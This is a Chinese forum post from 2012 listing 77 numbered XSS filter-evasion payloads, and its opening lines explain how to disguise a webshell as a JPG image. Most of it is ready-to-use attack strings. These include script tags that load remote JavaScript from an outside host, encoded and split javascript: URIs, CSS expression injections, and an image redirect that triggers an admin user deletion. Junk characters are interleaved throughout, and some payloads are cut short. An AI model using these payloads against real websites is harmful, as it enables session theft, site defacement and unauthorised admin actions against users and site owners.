跨站图片shell' Y) s( ^" L: w* g; g. T! p, j
XSS跨站代码 <script>alert("")</script>7 e7 `+ S) w4 M! E( j; S
. u9 `5 U4 ]! E- l* Y- T
将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马* z v0 ? A$ Y s! p
- S* n( Q, Q w# Q. i4 x2 A
2 J6 d$ S8 _' Z7 U+ ]; C) b' e& h% K
1)普通的XSS JavaScript注入- \1 d7 U/ b" k( F. C9 Y: |% Q X
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>; D- p) O1 ~1 n" M' k! c
( y2 @- P) ]/ V9 u. ?" j2 O# J(2)IMG标签XSS使用JavaScript命令+ J3 ]2 n1 V6 @9 Q
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
* D$ v/ z: [1 r9 \+ L
9 D P" y, g' }7 W(3)IMG标签无分号无引号
& Z8 J _4 w- v3 n9 l<IMG SRC=javascript:alert(‘XSS’)>4 x0 @% i p# e( Y
' p/ M4 H( j, L. Z
(4)IMG标签大小写不敏感1 V/ i: U8 x# z5 ]3 v+ V* U
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>, ~2 X% O; r& t; p N% D- T/ j
- O5 j: j7 Z3 d9 n4 G; T; m. ?
(5)HTML编码(必须有分号)
2 y8 z# R/ I4 U<IMG SRC=javascript:alert(“XSS”)>
3 T. Z1 C" P6 t8 @8 Y' ~& U W: c
3 _+ x$ Y1 C; T4 i(6)修正缺陷IMG标签# Y7 L, V+ L" |
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
0 E8 p( t9 B% e$ G! n: Q6 H- G" W" I1 A# M
(7)formCharCode标签(计算器)
) w, ~% @) k. P3 q" C: o<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
$ _* j1 J! e+ e& h5 C! \
$ K/ P- G8 u d1 b7 I" j(8)UTF-8的Unicode编码(计算器)) e7 V, n3 J- e
<IMG SRC=jav..省略..S')>
5 h9 s) e, ^- I: z; K+ R8 q
( Y, O: g! @( j w(9)7位的UTF-8的Unicode编码是没有分号的(计算器)) V6 n4 Q0 g1 a. o( X+ m/ C
<IMG SRC=jav..省略..S')>, C, Z: o% e. m7 _8 u
% N; X# R S$ H2 d4 o9 j2 Q# B(10)十六进制编码也是没有分号(计算器)" t1 d7 ~2 A0 u0 @' l7 R2 @# s5 k
<IMG SRC=java..省略..XSS')># ~' r1 \4 F4 C3 o! \/ k& ~
4 r. U, I! W2 ?0 n; B(11)嵌入式标签,将Javascript分开
' V5 p6 g" P% W+ f8 b' y) t<IMG SRC=”jav ascript:alert(‘XSS’);”>
* K- F' J6 v3 `
1 [. ]8 W1 e2 f' I4 U6 p(12)嵌入式编码标签,将Javascript分开- d B3 `0 @. K( Y3 N0 f% ?1 r
<IMG SRC=”jav ascript:alert(‘XSS’);”>
, A5 O& V; y1 R4 B" c3 C
1 b- R! D% k$ K- Z(13)嵌入式换行符
( [9 O9 ~/ ]8 p<IMG SRC=”jav ascript:alert(‘XSS’);”>. M. Z% T) \4 Q" ^# W/ d
6 z9 g4 x5 c v$ \
(14)嵌入式回车
5 p/ g, }- J* u8 Z4 A7 ^<IMG SRC=”jav ascript:alert(‘XSS’);”>& x# N# Y) W/ g3 {# \
6 i: B2 E1 B; Q(15)嵌入式多行注入JavaScript,这是XSS极端的例子
- b# R' H% f% X. Q- C<IMG SRC=”javascript:alert(‘XSS‘)”>
7 E' |/ W' H) ?0 y' @
6 w1 N# w, _8 ]4 Z, v(16)解决限制字符(要求同页面)4 t( o: r# c& @ j5 X7 O
<script>z=’document.’</script>' l z/ p, k/ |7 b. b: J
<script>z=z+’write(“‘</script>0 V0 s! i9 A7 B0 m& c
<script>z=z+’<script’</script>
, w" R% [4 t- l! {. Q<script>z=z+’ src=ht’</script>
" p; E/ b# ?! e% f<script>z=z+’tp://ww’</script>
6 Y7 Z5 Y: {. w, Y<script>z=z+’w.shell’</script>
5 z1 w! H/ x. c) L$ U( F6 {<script>z=z+’.net/1.’</script>
+ U, A- } O$ O<script>z=z+’js></sc’</script>
* s$ r* _5 M( k, g8 Q<script>z=z+’ript>”)’</script>
, k" T7 C! S; i7 T0 K<script>eval_r(z)</script>
. W# t# s& U' x% I: j1 m4 p, n: K5 Y
(17)空字符, G3 F; [6 r( A5 H" x( ^9 @9 G0 W, [8 T
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out; Y2 Q0 ?3 p6 P9 j' i$ m: K. P
$ e' I% n2 T* c9 {/ h: z(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
( p# g( ^; c) X; c- t9 \& Yperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out8 Z: P" \; s5 J9 x# U) e
) P' T/ ^" x1 D+ l% D. h
(19)Spaces和meta前的IMG标签
# c% T5 j' p5 ]% r) ^& T8 Q$ [<IMG SRC=” javascript:alert(‘XSS’);”>
# x9 I1 ~- Y0 L* O
% h# ]- r; f( N. j" G, O4 _. u(20)Non-alpha-non-digit XSS
0 `" H& O( O- c7 `<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
; x! z. z3 o$ o- B3 Z" I- Q/ K, \6 ?( S+ q: n! _3 r3 ]* I% y/ i
(21)Non-alpha-non-digit XSS to 25 c, a( o7 _0 n3 _7 k
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
" M3 e0 |3 A% @ V. E1 p0 v8 |( K, t- {# J* {$ g! k
(22)Non-alpha-non-digit XSS to 3. T. w: ~; y, ]7 D
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>' h) z! d# t8 {1 x( | I0 j
5 |( h1 K5 P) w2 ~/ M& P( m(23)双开括号6 n0 n& t ?' v0 f; X2 V
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
& h8 f( k( s, {
0 y0 O# Q" H' Z: u8 V w7 @4 k- r! `(24)无结束脚本标记(仅火狐等浏览器)6 h# L* _4 p( h) e# X
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
4 v# e6 E0 d4 Q7 s! Z5 Q1 M: K% ~' p# U$ b _$ _+ L% b
(25)无结束脚本标记2 s1 D. ^4 F0 r& j0 m% B
<SCRIPT SRC=//3w.org/XSS/xss.js>' Z6 g5 [3 O2 X/ t, ?: F3 r2 M6 q2 `
$ A, I9 C3 l' X
(26)半开的HTML/JavaScript XSS' f8 k( ]( w2 G; b& `8 J5 q
<IMG SRC=”javascript:alert(‘XSS’)”
* R l/ f0 w& t3 _. d" D- l/ `- L
3 S! m: j) k! F% E" \(27)双开角括号
& u5 A9 x3 I3 ]! j; a<iframe src=http://3w.org/XSS.html <- q. i. n9 J5 s @* f3 Z
# P, Z6 Q8 U% p
(28)无单引号 双引号 分号1 {: T' D$ I( ~( f. _$ h" G
<SCRIPT>a=/XSS/0 T1 ^7 A$ F+ o6 m- e/ ~
alert(a.source)</SCRIPT>
8 s' i: \. g8 m) h' }; I( F% [ k. L* M/ b6 ?* h# H# l5 @
(29)换码过滤的JavaScript8 ~7 C( D/ u# m
\”;alert(‘XSS’);//7 C7 a* Y* n4 N; ?" @$ |
. `/ U2 h- ~$ _(30)结束Title标签$ I2 B" C5 ~5 g# ]5 P
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
" \0 Y' B9 {+ S6 z8 b( U* f: n* J; I
(31)Input Image
! J% E, ^* [& p1 ^! M* z$ T: [<INPUT SRC=”javascript:alert(‘XSS’);”># d4 X6 b; _, E8 X/ j4 N8 ?* u
+ R9 r$ d- U: P0 ~! t
(32)BODY Image
3 w* S1 l0 X; j1 c+ \/ _7 X<BODY BACKGROUND=”javascript:alert(‘XSS’)”>5 p ]$ D, D$ \, Q2 S
3 i) {; s" P' C4 B( P8 O1 {# B(33)BODY标签9 p1 g/ a& @( b; B9 [
<BODY(‘XSS’)>
9 P$ W) {$ K; N- f% B/ K- R
$ _$ e8 H. {$ Y7 C0 X) [7 T' p9 w(34)IMG Dynsrc9 Q0 n- d0 v3 V' _
<IMG DYNSRC=”javascript:alert(‘XSS’)”>9 _; w" p5 i+ M, a+ T# U: C+ T* G
. H/ ^" m6 U# G Y, U(35)IMG Lowsrc
2 A1 m1 T* N2 y4 `" k; R<IMG LOWSRC=”javascript:alert(‘XSS’)”>
( e1 E# T- K4 \" u- \8 ~5 F- C$ F" Q" `- }$ R6 M& L# l
(36)BGSOUND2 n' h0 I1 u3 @* I4 W4 h$ b: n! o
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
- T0 ^: v+ O" j: t. i- _; V, z* l1 C, T8 H. j- e' |
(37)STYLE sheet0 a8 @1 }6 b) {7 ~5 C
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>6 l9 P4 p! A i; Z: V/ Y+ y. W; b! |
6 ~0 I; g5 l: [0 R9 T: o: z& X; }(38)远程样式表) u( q+ B) v+ p
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>; U! Y# w$ H# X. |7 m
% E% V$ t+ r( D8 |" b2 L1 t7 h
(39)List-style-image(列表式)
0 t2 F& Y- ?1 O2 _<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
' [# ^. Z# L% T: J3 v9 g' t
: [- {* f7 \' G0 v(40)IMG VBscript( W. c) `: g1 \6 \; I5 T
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
! S! S1 ?! j4 l5 q. F7 y0 a3 i4 e2 ~0 {1 r& N: f
(41)META链接url
! a- h2 Y5 C6 f1 ^6 H9 h<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
" x1 H* r2 C2 C4 s# ?- ?" W8 A/ f; r
(42)Iframe6 F) I' x. X, S1 F- @
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>& I0 C1 D1 |/ }, v M" ?- {
(43)Frame. Q# o' l" e. }6 U" @- n$ l$ V
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
* n- R8 G4 x, ~8 E" ~$ s
) t9 ]. d5 b. O- d- N(44)Table
. N5 ~) q6 z$ k! R- a4 { j<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
$ ?, f$ n6 r, B" b- X( L N8 }& e
(45)TD
& F0 g2 E$ V2 `# E<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
9 _8 M+ j/ j) n, ~( ?3 M) G' P( W4 y4 o
(46)DIV background-image
; D, N# s1 r' G<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
" d5 f# w8 ^' H% I1 D6 d
! E! J! X2 n- q# i1 j* m4 ?(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
6 D& C/ u' F W- o: g<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>& s* V$ Z! g2 j3 B% t! X
" T; l; F1 s C" V(48)DIV expression* s6 H# `2 o* }
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
% F9 Z, u3 r0 \9 t& J A5 s q2 S4 |" y+ ?& m" G
(49)STYLE属性分拆表达
5 k3 [' x7 ^9 @# i( O<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
$ y- R; f$ m$ a" g4 j3 G' N& o# i/ e/ ?' J# t
(50)匿名STYLE(组成:开角号和一个字母开头)5 ^3 ^# J" `* V+ l7 E d
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>$ }; r) N! Q) [% v7 {: _
. z |/ k! A r8 R& N3 X
(51)STYLE background-image/ E. S" z: W+ ^4 L/ n) k N
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
( F' T! K& c5 u. N
: u, v# i7 A R) ~: G, B9 r) ^& F(52)IMG STYLE方式
' {! ^$ i2 \1 L9 ]" y9 Texppression(alert(“XSS”))’>
+ u' H4 B& z. r7 g( x7 J6 m0 T" O1 P
: v, |/ v. j7 t(53)STYLE background7 K8 E5 S% ]* e9 n8 ^5 R0 e
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>' ?2 @5 D* r5 K7 K1 {8 J
7 w; j) X$ j8 i A! G/ x(54)BASE
3 }1 ]$ K7 Q: c1 F* b9 a3 z<BASE HREF=”javascript:alert(‘XSS’);//”>
! Y* K, y9 }5 C1 x9 G g. h
$ Y3 \0 R4 V' a; y+ n% v(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS/ a. p! C( v; c2 k; {7 C
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>$ N0 o" X' A7 ~8 A& D. a2 A
2 K, N! A+ ]" N( o1 r+ ?/ e(56)在flash中使用ActionScrpt可以混进你XSS的代码5 N( @5 `& s- y: P* i* D) X) V
a=”get”;
1 K# b# v2 ? E8 Ub=”URL(\”";
8 s7 O( p2 l0 j1 R' r0 Nc=”javascript:”;
$ l2 J& j2 B: C, R0 ~% vd=”alert(‘XSS’);\”)”;7 l& g& s S2 o5 P
eval_r(a+b+c+d);9 I. D3 g) c# |5 C4 m5 Z
+ S. d+ j( [2 ]5 d$ s0 H: F
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
. H6 [6 R, p$ Y3 L: h! Q<HTML xmlns:xss>$ d' O7 g9 K) K! ^
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
# t& H0 [+ }+ Q6 Z<xss:xss>XSS</xss:xss>
1 o: j" s& w8 d/ Y# q: g</HTML>
) `. Y6 e$ \1 a( G) K8 K6 d% O
- Z6 f7 Q6 P6 Z w6 q% M& a(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
1 }) z) ~; N$ a$ Z<SCRIPT SRC=””></SCRIPT>: f' n% n' [/ ]: J- d
8 s. _3 f/ V5 ~- u' Z(59)IMG嵌入式命令,可执行任意命令
$ p+ C% Z$ q& `$ K9 v<IMG SRC=”http://www.XXX.com/a.php?a=b”>
( v/ i( p1 B: A/ Q; ~+ F
/ Z7 B/ i" V( N0 W V(60)IMG嵌入式命令(a.jpg在同服务器)3 p3 G* ~( e/ n& A
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
m0 }: u$ v9 R' X8 X0 k; g+ G2 }* ]/ s/ Y1 j. z3 ]) z6 \
(61)绕符号过滤2 h: Q4 b! V* Y4 U
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>7 [: q* E- c2 A+ S0 e2 b
2 H/ U! a" s* L1 N# y( i
(62)
/ N$ e' }6 P* g<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
5 v1 Q: U% g% l1 Q
' [1 I. f: m- e' r! F(63)
! a4 Z' o8 ?' B' ^* t<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
1 d) ?0 c- Y. R) T) A/ ? o' }$ V% _6 c) ~0 ~$ ]
(64)
) O. E& P# ~9 U; S I/ v<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>1 s+ r, p+ p+ V5 i! q! U `
- z3 J& T8 R8 h* T2 U6 A(65)) |: `& k6 F- ~# h5 k( O
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
5 [5 q7 N0 P- i$ H# }+ d3 ~/ ^8 J" M# T
& Y! M- x8 f* T; [% B/ ?0 g6 O$ f(66)+ A& J2 ~6 w- G7 l. g
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
4 g0 m W3 y: k4 b+ I1 H4 _5 S% _3 D+ \; @3 c
(67). n" ~- m' P/ {, k
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
7 Y& }: s" E: f k! v$ R, e% ]/ ]* w% E) k) ?4 g8 V6 P2 C
(68)URL绕行( ]6 b$ M1 t* P4 a% t0 D1 G
<A HREF=”http://127.0.0.1/”>XSS</A>. g) N& o+ [3 t! P- _" `$ T9 Y
. n% w% N0 s9 b# U( f M
(69)URL编码
4 g2 T. K$ D3 H; U% G! w# |<A HREF=”http://3w.org”>XSS</A>
r' M+ [+ Y2 x, }2 y2 L2 L" S% u( _# L8 p- b- N8 i
(70)IP十进制' y' ?( s2 e% H' f" @, z: l
<A HREF=”http://3232235521″>XSS</A>5 P+ c; E w+ D4 R! w" n! C, b
z; J7 y2 b! n9 @) j# Y& g" A9 O
(71)IP十六进制
% i7 W. w; L0 n. c6 @2 O<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
5 [( C2 {; [, c: l% \8 ^0 w5 P7 p5 Y: |: T- \
(72)IP八进制3 u. c; g3 `! r& [" Q, W7 r
<A HREF=”http://0300.0250.0000.0001″>XSS</A>2 v4 Q2 c' D/ v0 _: J
2 U+ x% G* }8 x
(73)混合编码
6 n1 V# E1 H0 r- s<A HREF=”h$ G* w% Q: a: d; W) Z% t8 |) }
tt p://6 6.000146.0×7.147/”">XSS</A>
' M$ B3 ]4 E4 I4 S4 n; Q b0 u; I% n1 A7 b/ m$ n3 M1 v5 F2 \
(74)节省[http:]
F4 F* f* t* M1 N# i& U& {7 L<A HREF=”//www.google.com/”>XSS</A>) U4 @* ^2 E/ c
, G$ h( ?' F- y4 p# F$ b/ h6 d(75)节省[www]
& q2 h* \2 ^# N* X, C+ B<A HREF=”http://google.com/”>XSS</A>
: P2 N* A2 g/ m2 B5 q& E3 ^" T0 u$ P' u! W* }* n
(76)绝对点绝对DNS: Y/ S. l6 z7 c; s3 n2 J' H
<A HREF=”http://www.google.com./”>XSS</A>- r. V: G9 _: x5 U. `
3 L- _3 O; ?7 G' c& }! [(77)javascript链接
1 N2 C: o4 ]1 K8 E9 n) y \<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
! w3 G: v! ]0 a3 m |
发表于 2012-9-13 17:04:56
收藏
支持
反对